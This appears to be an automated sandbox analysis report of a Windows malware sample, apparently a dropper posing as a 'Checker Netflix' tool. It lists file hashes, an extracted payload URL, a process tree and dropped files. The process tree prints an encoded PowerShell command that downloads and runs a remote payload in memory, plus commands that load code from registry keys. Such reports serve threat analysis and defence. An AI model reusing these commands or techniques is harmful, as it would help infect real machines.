Analysis

  • max time kernel
    4s
  • max time network
    154s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    25-05-2022 00:29

General

  • Target

    a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe

  • Size

    1.7MB

  • MD5

    98bfaca19a9ae44bb60fbc3e98e54d09

  • SHA1

    e2f100fc3eb808fe26cdc26327920293c1272cab

  • SHA256

    a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3

  • SHA512

    d8b5abdb9692f54a512d53589537bb8b4aa489443ef7ae77aede69d5c1510a32ce2508eeca1ff50898fb2305151c53b9f03449dac9a75b4ea8aa370a324f4fbe

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

https://6.top4top.net/p_13529t6r71.jpg

Signatures

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
    "C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe"
    1⤵
    • Loads dropped DLL
    • Suspicious use of WriteProcessMemory
    PID:880
    • C:\Windows\SysWOW64\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"
      2⤵
        PID:1400
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)
          3⤵
            PID:1508
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:1636
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"
          2⤵
            PID:1516
          • C:\Users\Admin\AppData\Roaming\Checker Netflix.exe
            "C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"
            2⤵
            • Executes dropped EXE
            PID:964
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==
          1⤵
            PID:1588
          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)
            1⤵
              PID:1772

            Network

            MITRE ATT&CK Enterprise v6

            Downloads

            • C:\Users\Admin\AppData\Roaming\Checker Netflix.exe

              Filesize

              1.5MB

              MD5

              068068c3cefb4c8d997271897c3173bb

              SHA1

              d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

              SHA256

              23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

              SHA512

              0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

            • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

              Filesize

              7KB

              MD5

              a65c23a0b2c19e4cc65cae332397d73e

              SHA1

              fa93da00b09e1c68f771f481d725f01a03913ee6

              SHA256

              b96823ee539c570ed2ab01d02aefe7cbd56b31d6ec4379e2971ff6131de5e77a

              SHA512

              c71054f895c30d357ce9a636d957235b46ce6afcd7c6bd23ee2ac7aa08d5493b55cfe077553242be06464fbe7eff6113c37ac764f82b5c5a3913ab2c072c1b64

            • C:\Users\Admin\AppData\Roaming\l1l1l.vbs

              Filesize

              129KB

              MD5

              c78f607c916f060d6ee3bf391e303acc

              SHA1

              1575998cda060d4a570ba258abc12044601da283

              SHA256

              f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4

              SHA512

              cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b

            • C:\Users\Admin\AppData\Roaming\powershell.js

              Filesize

              2KB

              MD5

              40b65baa1541784dd92f5aa8ae11b0ef

              SHA1

              0772c95f56a025704c01389f2d1108a17fb987cf

              SHA256

              9609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699

              SHA512

              fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2

            • C:\Users\Admin\AppData\Roaming\r1r1.vbs

              Filesize

              87KB

              MD5

              0494f414da149631c3d59861865dad37

              SHA1

              c9fd335759efb52e58acb974af27cdecb35d0f10

              SHA256

              a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56

              SHA512

              a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333

            • \Users\Admin\AppData\Roaming\Checker Netflix.exe

              Filesize

              1.5MB

              MD5

              068068c3cefb4c8d997271897c3173bb

              SHA1

              d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e

              SHA256

              23d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5

              SHA512

              0b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a

            • memory/880-54-0x0000000075711000-0x0000000075713000-memory.dmp

              Filesize

              8KB

            • memory/964-82-0x0000000000500000-0x0000000000506000-memory.dmp

              Filesize

              24KB

            • memory/964-81-0x0000000004EC0000-0x0000000005058000-memory.dmp

              Filesize

              1.6MB

            • memory/964-84-0x00000000003F5000-0x0000000000406000-memory.dmp

              Filesize

              68KB

            • memory/964-76-0x0000000000200000-0x0000000000380000-memory.dmp

              Filesize

              1.5MB

            • memory/964-77-0x00000000001F0000-0x00000000001F6000-memory.dmp

              Filesize

              24KB

            • memory/964-56-0x0000000000000000-mapping.dmp

            • memory/1400-61-0x0000000000000000-mapping.dmp

            • memory/1508-71-0x0000000000000000-mapping.dmp

            • memory/1508-80-0x00000000715A0000-0x0000000071B4B000-memory.dmp

              Filesize

              5.7MB

            • memory/1516-59-0x0000000000000000-mapping.dmp

            • memory/1588-78-0x00000000715A0000-0x0000000071B4B000-memory.dmp

              Filesize

              5.7MB

            • memory/1588-68-0x0000000000000000-mapping.dmp

            • memory/1636-60-0x0000000000000000-mapping.dmp

            • memory/1772-79-0x00000000715A0000-0x0000000071B4B000-memory.dmp

              Filesize

              5.7MB

            • memory/1772-70-0x0000000000000000-mapping.dmp